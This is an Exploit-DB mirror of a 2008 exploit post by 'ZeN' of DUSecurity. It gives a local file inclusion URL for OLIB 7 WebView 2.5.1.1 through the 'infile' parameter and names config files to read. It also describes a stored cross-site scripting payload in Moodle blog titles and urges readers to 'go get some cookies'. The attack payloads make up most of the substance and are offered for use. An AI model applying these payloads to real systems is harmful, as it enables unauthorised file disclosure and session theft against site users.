Security Advisory for 'OLIB 7 Webview'

vendor:

OLIB 7 WebView

by:

ZeN

7.5

CVSS

HIGH

LFI

N/A

CWE

Product Name: OLIB 7 WebView

Affected Version From: 2.5.1.1

Affected Version To: 2.5.1.1

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Security Advisory for ‘OLIB 7 Webview’

http://olib.site.com/cgi/?session=[session_key]&infile=[LFI] files in dir - get_settings.ini, setup.ini(contains config file locations), text.ini You need to login to get a valid session key.

Mitigation:

Source

Exploit-DB raw data:

Security Advisory for 'OLIB 7 Webview'

This software is apart of Moodle.

Software - OLIB 7 WebView v2.5.1.1
Exploit  - LFI
Severity - High
Author	 - ZeN
website  - http://dusecurity.com/
Date	 - 2nd October 2008

DUSecurity Team / DarkCode


Exploit >

http://olib.site.com/cgi/?session=[session_key]&infile=[LFI]

files in dir - get_settings.ini, setup.ini(contains config file locations), text.ini


Info - You need to login to get a valid session key.


------------------
Extraz :

Moodle Permanent XSS

In Moodle blogging system, simply make a new blog entry with the title

<script>alert()</script>

Now everyone that visits the bloggins system with execute your XSS.
Go get some cookies =D

Enjoy!

------------------


Shouts :-
DUSecurity.com
DarkCode.me
Milw0rm.com
iWannaHack
WL-Group

# milw0rm.com [2008-10-02]